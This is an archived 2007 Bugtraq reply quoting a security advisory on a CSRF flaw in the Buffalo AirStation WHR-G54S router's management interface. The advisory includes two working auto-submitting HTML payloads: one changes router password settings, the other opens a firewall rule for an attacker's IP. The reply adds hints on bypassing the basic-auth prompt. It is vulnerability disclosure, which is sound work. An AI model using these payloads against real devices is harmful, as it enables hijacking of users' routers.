lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri, 7 Sep 2007 16:27:56 +0100
From: "Adrian P" <unknown.pentester@...il.com>
To: bugtraq@...urityfocus.com
Cc: "Henri Lindberg - Smilehouse Oy" <henri.lindberg@...lehouse.com>
Subject: Re: Buffalo AirStation WHR-G54S CSRF vulnerability

On 9/7/07, Henri Lindberg - Smilehouse Oy <henri.lindberg@...lehouse.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
>                           Louhi Networks Oy
>                        -= Security Advisory =-
>
>
>       Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
>                 vulnerability
>   Release Date: 2007-09-07
>  Last Modified: 2007-09-07
>        Authors: Henri Lindberg, Associate of (ISC)²
>                 [henri d0t lindberg at louhi d0t fi]
>
>    Application: Buffalo AirStation Web Management
>
>        Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
>       Severity: Cross site request forgery in management interface
>           Risk: Moderate
>  Vendor Status: No response from vendor.
>     References: http://www.louhi.fi/advisory/buffalo_070907.txt
>
>
> Overview:
>
>     During cursory inspection of WHR-G54S it was discovered that a cross
>     site request forgery vulnerability exists in the management
>     interface. Thus, it is possible for an attacker to perform any
>     administrative action in the management interface. These include
>     e.g. changing administrative password or adding new firewall rules.
>
>
> Details:
>
>     Buffalo AirStation WHR-G54S Ver.1.20 device management interface
>     does not validate the origin of an HTTP request. If attacker is able
>     to make user visit a hostile web page, a  device can be controlled
>     by submitting suitable forms. It is possible to add new users for
>     example.
>
>     Successful attack requires that the attacker knows the management
>     interface address for the target device. As authentication is done
>     using HTTP Basic authentication, exploiting this vulnerability
>     requires more effort compared to forms authentication.

"More effort" _unless_ the administrator has NOT changed the default
admin credentials or that he/she has NOT clicked on "Save Password" on
his browser auth prompt any time in the past. Any of these two
conditions would certainly make the attack more feasible. Just thought
it's worth it saying, that's all :-D

And yes, there are tricks so that when you get CSRFed on a browser
that has the basic auth credentials saved, the auth prompt will NOT
pop up in order to get confirmation from the user to submit the
request. I'm sure some people know what I'm talking about.

Good advisory and thank you for sharing it with us!

PS: Henri, please do not hesitate to contact me if you want feedback
on any 0days CSRF you might have at the moment.

>
>
> Proof of Concept:
>
> <html>
>   <body onload="document.CSRF.submit()">
>     <form name="CSRF" method="post"
>     action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html
>     "style="display:none">
>
>      <input name="ap" value="Evil">
>      <input name="TEST_INPUT" value="1">
>      <input name="edit_ropass" value="evil">
>      <input name="edit_ropass2" value="evil">
>      <input name="ropass" value="live">
>      <input name="gupass" value="">
>     </form>
>   </body>
> </html>
>
> Note: ropass value is reversed edit_ropass value.
>
> <html>
>   <body onload="document.CSRF.submit()">
>     <form name="CSRF" method="post"
>     action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html"
>     style="display:none">
>
> <input name="sela" value="ACCEPT">
> <input name="sel_direction" value="WAN">
> <input name="H_sour_ip" value="1.1.1.1">
> <input name="H_dest_ip" value="">
> <input name="H_prt" value="all">
> <input name="Do_ADDtop" value="Add%A0%28Head%29">
>
> </form>
> </body>
> </html>
>
> 1.1.1.1 = attacker's IP address
>
>
> Workaround:
>
>     Do not browse untrusted websites while using the management
>     interface.
>
>     Log out after administering the device.
>
> More information
>
>     http://en.wikipedia.org/wiki/Cross-site_request_forgery
>
> Disclosure Timeline:
>
>     XX  July 2007       - Discovered the issue
>     15. August 2007     - Contacted Buffalo
>     17. August 2007     - Contacted Buffalo again.
>     7.  September 2007  - No response from Vendor.
>     7.  September 2007  - Advisory released
>
>
> Copyright 2007 Louhi Networks Oy. All rights reserved.
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (MingW32)
>
> iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3
> Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
> =+E8f
> -----END PGP SIGNATURE-----
>


-- 
pagvac
gnucitizen.org, ikwt.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ